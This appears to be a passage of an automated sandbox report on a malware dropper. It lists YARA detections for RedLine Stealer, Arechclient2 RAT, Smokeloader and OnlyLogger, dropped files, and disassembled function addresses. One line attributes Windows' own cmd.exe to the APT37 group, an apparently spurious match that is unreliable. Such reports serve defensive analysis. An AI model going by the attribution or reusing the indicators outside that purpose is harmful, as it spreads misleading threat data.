                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 32.2.Mon17948100733a95c58.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_3d9371fd, Author: unknown
                  Source: 32.2.Mon17948100733a95c58.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 1.3.setup_installer.exe.2f8e26e.10.unpack, type: UNPACKEDPE, Matched rule: Detects downloader / injector, Author: ditekSHen
                  Source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_3d9371fd, Author: unknown
                  Source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 26.2.Mon1785436ae78.exe.17e0e50.1.unpack, type: UNPACKEDPE, Matched rule: Detects OnlyLogger loader variants, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_3d9371fd, Author: unknown
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 26.2.Mon1785436ae78.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects OnlyLogger loader variants, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 00000018.00000002.1990631383.0000000001700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                  Source: 0000001D.00000002.4154666399.000000000184F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                  Source: 0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                  Source: 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 0000001A.00000002.4146777079.0000000000400000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY, Matched rule: Detects OnlyLogger loader variants, Author: ditekSHen
                  Source: 0000001D.00000002.4147517573.0000000000400000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 00000018.00000002.1993787131.0000000001841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_4e31426e, Author: unknown
                  Source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_3d9371fd, Author: unknown
                  Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects Arechclient2 RAT, Author: ditekSHen
                  Source: 0000001D.00000002.4153571482.00000000017F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                  Source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 00000018.00000002.1990867892.0000000001710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_4e31426e, Author: unknown
                  Source: 0000001A.00000003.1792106569.0000000001880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects OnlyLogger loader variants, Author: ditekSHen
                  Source: 00000018.00000002.1993661791.000000000176E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                  Source: 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 0000002F.00000002.4156074692.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_4e31426e, Author: unknown
                  Source: 0000001A.00000002.4154343968.0000000001A2F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                  Source: 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_3d9371fd, Author: unknown
                  Source: 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects unknown loader / injector, Author: ditekSHen
                  Source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_3d9371fd, Author: unknown
                  Source: 0000001D.00000003.1777699508.0000000003140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_3d9371fd, Author: unknown
                  Source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 7892, type: MEMORYSTR, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: Process Memory Space: Mon17948100733a95c58.exe PID: 8056, type: MEMORYSTR, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: Process Memory Space: Mon179e1058f256.exe PID: 8164, type: MEMORYSTR, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 1308, type: MEMORYSTR, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe, type: DROPPED, Matched rule: Detects downloader / injector, Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurlpp.dll, type: DROPPED, Matched rule: Detects unknown loader / injector, Author: ditekSHen
                  Source: C:\Windows\SysWOW64\cmd.exe, Dropped file: MD5: ac6ad5d9b99757c3a878f2d275ace198, Family: APT37, Alias: Reaper group, Geumseong121, Group 123, Scarcruft, APT-S-008, Red Eyes, TEMP.Reaper, Ricochet Chollima, sun team, APT37. Description: APT37 is a suspected North Korean cyber espionage group that has been in operation since at least 2012. Their targets are primarily located in South Korea, but also Japan, Vietnam, Russia, China, India, and some of the countries in the Middle East. A wider range of industries are affected, including chemicals, electronics, manufacturing, aerospace, automotive and healthcare entities. References: https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf, https://securelist.com/operation-daybreak/75100/, https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/. Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
                  Source: Mon17948100733a95c58.exe.1.dr, ComposerRequestClass.cs, Large array initialization: ValidateProcess: array initializer size 206202
                  Source: Mon17eac6d534bfd22c7.exe.1.dr, Container.cs, Large array initialization: ViewPrototype: array initializer size 211888
                  Source: Mon1795d04d4bd.exe.1.dr, Static PE information: section name: [$vdPf#
                  Source: libcurl.dll.1.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: libcurlpp.dll.1.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: libstdc++-6.dll.1.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Mon1795d04d4bd.exe.1.dr, Static PE information: section name:
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe, Code function: 14_2_05516220 NtUnmapViewOfSection
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe, Code function: 14_2_055162D8 NtAllocateVirtualMemory
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe, Code function: 14_2_05516218 NtUnmapViewOfSection
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe, Code function: 14_2_055162D0 NtAllocateVirtualMemory
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe, Code function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
                  Source: C:\Windows\System32\svchost.exe, File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe, Code function: 0_2_00406C5B
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe, Code function: 1_2_0040BD85
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe, Code function: 1_2_00403101
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe, Code function: 1_2_00410138
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe, Code function: 1_2_004192A1
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe, Code function: 1_2_0041937B
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe, Code function: 1_2_00416C70
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe, Code function: 1_2_00416536
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe, Code function: 1_2_00417EC0
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe, Code function: 1_2_00413ED0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_0043C020
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_004521F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_0040C270
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_004422D0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_00444390
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_0040E520
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_0043E5D0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_0042E6A0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_00434850
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_00410910
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_0043CB20
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_00432BE0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_0043ED60
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_00442D90
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_0044F1F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_00415260
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_004134F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_0043F510
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_0043D5D0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_0043B5F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_00435590
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_00417730
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_00443840
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_00441820
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_004338F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_00447B60
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_00431BC0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_00411C40
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_0040DCC0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_0040DC80
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_00415D00
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_00419EA0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_6494A5A0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_64948E30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, Code function: 2_2_6494B4A0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe, Code function: 14_2_02BFB950
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe, Code function: 14_2_02BFE268
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe, Code function: 14_2_02BFE9E8
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe, Code function: 14_2_055118D8
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe, Code function: 14_2_05513A50
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe, Code function: 14_2_055A8510
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe, Code function: 14_2_055AA7B8
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe, Code function: 14_2_055AD678
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe, Code function: 14_2_055A9178
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe, Code function: 14_2_055ACF10
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe, Code function: 18_2_0085D6E5
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F668E60
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F5D2E30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F5CCD70
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F5C1420
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F62F040
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F62D110
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F5F4F90
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F6B2F84
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F5F1F60
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F5FCF30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F65EF00
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F643D30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F627DD0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F633DA0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F614C70
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F64FC40
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F6B2CF0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F5F9CC0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F61FCC0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F640B80
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F5E9B70
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Code function: 19_2_00007FF72F641B40
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5F7C0019_2_00007FF72F5F7C00
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6B2C0C19_2_00007FF72F6B2C0C
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5E4BF019_2_00007FF72F5E4BF0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5CBA7019_2_00007FF72F5CBA70
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F62DA5019_2_00007FF72F62DA50
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5FEAD019_2_00007FF72F5FEAD0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F65499019_2_00007FF72F654990
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6AC93019_2_00007FF72F6AC930
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5F693019_2_00007FF72F5F6930
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F63492019_2_00007FF72F634920
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F63F9C019_2_00007FF72F63F9C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F61B8F019_2_00007FF72F61B8F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6238E019_2_00007FF72F6238E0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5FD78019_2_00007FF72F5FD780
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6AD7DC19_2_00007FF72F6AD7DC
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F62767019_2_00007FF72F627670
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F65562019_2_00007FF72F655620
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F61C71019_2_00007FF72F61C710
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6B36A419_2_00007FF72F6B36A4
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F60758019_2_00007FF72F607580
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F64758019_2_00007FF72F647580
